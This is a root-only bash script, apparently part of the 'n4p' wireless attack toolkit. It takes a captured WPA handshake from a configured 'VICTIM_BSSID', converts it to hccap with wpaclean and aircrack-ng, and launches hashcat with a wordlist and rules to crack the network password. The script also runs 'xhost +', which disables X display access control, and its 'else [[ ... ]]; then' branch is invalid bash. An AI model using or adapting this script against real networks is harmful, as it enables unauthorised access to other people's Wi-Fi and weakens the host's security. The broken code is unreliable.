#!/bin/bash
##############################################
# Do all prerun variables and safty measures #
# before anything else starts happening      #
##############################################
if [[ $(id -u) != 0 ]]; then # Verify we are root if not exit
   echo "Please Run This Script As Root or With Sudo!" 1>&2
   exit 1
fi

DIR_CONF=/etc/n4p/

#######################################
# Building a sane working environment #
#######################################
xhost + # This is required for hashcat

SESSIONFOLDER=/tmp/n4p/ # Set our tmp working configuration directory

get_name() # Retrieve the config values
{
    USE=$(grep $1 ${DIR_CONF}n4p.conf | awk -F= '{print $2}')
}

depends()
{
    get_name "VICTIM_BSSID="; VICTIM_BSSID=$USE
    get_name "HASHCAT_TYPE="; HASHCAT_TYPE=$USE
    get_name "HASHCAT_LOCATION="; HASHCAT_LOCATION=$USE
    get_name "HASHCAT_MODE="; HASHCAT_MODE=$USE
    get_name "WORD_LIST="; WORD_LIST=$USE
    get_name "HASHCAT_RULES="; HASHCAT_RULES=$USE
    get_name "HASHCAT_THREADS="; HASHCAT_THREADS=$USE
}

shallwecrack()
{
    echo "${VICTIM_BSSID} was converted to hccap file. Here is the directory listing"
    ls ${SESSIONFOLDER}
    read -p "Would you like to run Hashcat now on ${VICTIM_BSSID}.hccap? Y/N?" DOHASHCAT
    if [[ $DOHASHCAT == [yY] ]]; then
        hashcat
    elif [[ $DOHASHCAT == [nN] ]]; then
        exit 0
    else
        echo "Hey there butterfingers"
        shallwecrack
    fi
}

hcap()
{
  if [[ -f ${SESSIONFOLDER}${VICTIM_BSSID}-01.cap ]]; then
    wpaclean clean.cap ${SESSIONFOLDER}${VICTIM_BSSID}-01.cap
    aircrack-ng -J "${SESSIONFOLDER}${VICTIM_BSSID}-01.cap" "clean.cap" >> /dev/null
    rm ${SESSIONFOLDER}clean.cap
    mv ${SESSIONFOLDER}${VICTIM_BSSID}-01.cap.hccap ${SESSIONFOLDER}${VICTIM_BSSID}.hccap
    echo "${SESSIONFOLDER}${VICTIM_BSSID}.hccap created"
    shallwecrack
  else [[ ! -f ${SESSIONFOLDER}${VICTIM_BSSID}-01.cap ]]; then
      if [[ -f ${SESSIONFOLDER}${VICTIM_BSSID}.hccap ]]; then
          echo "${SESSIONFOLDER}${VICTIM_BSSID}.hccap already exists"
          shallwecrack
      else
        #This is an odd line we shouldn't see much. The hccap conversion removes the original cap file. 
        #This section is prompted if the expected cap is non existent and the expected hccap is also non existent
          echo "${SESSIONFOLDER}${VICTIM_BSSID}-01.cap not found! You will need to investigate why this happened."
      fi
  fi
}

hashcat()
{
  ./${HASHCAT_LOCATION}${HASHCAT_TYPE}.bin ${HASHCAT_MODE}${HASHCAT_THREADS} ${SESSIONFOLDER}${VICTIM_BSSID}.hccap ${WORD_LIST} ${HASHCAT_RULES}
}
depends
hcap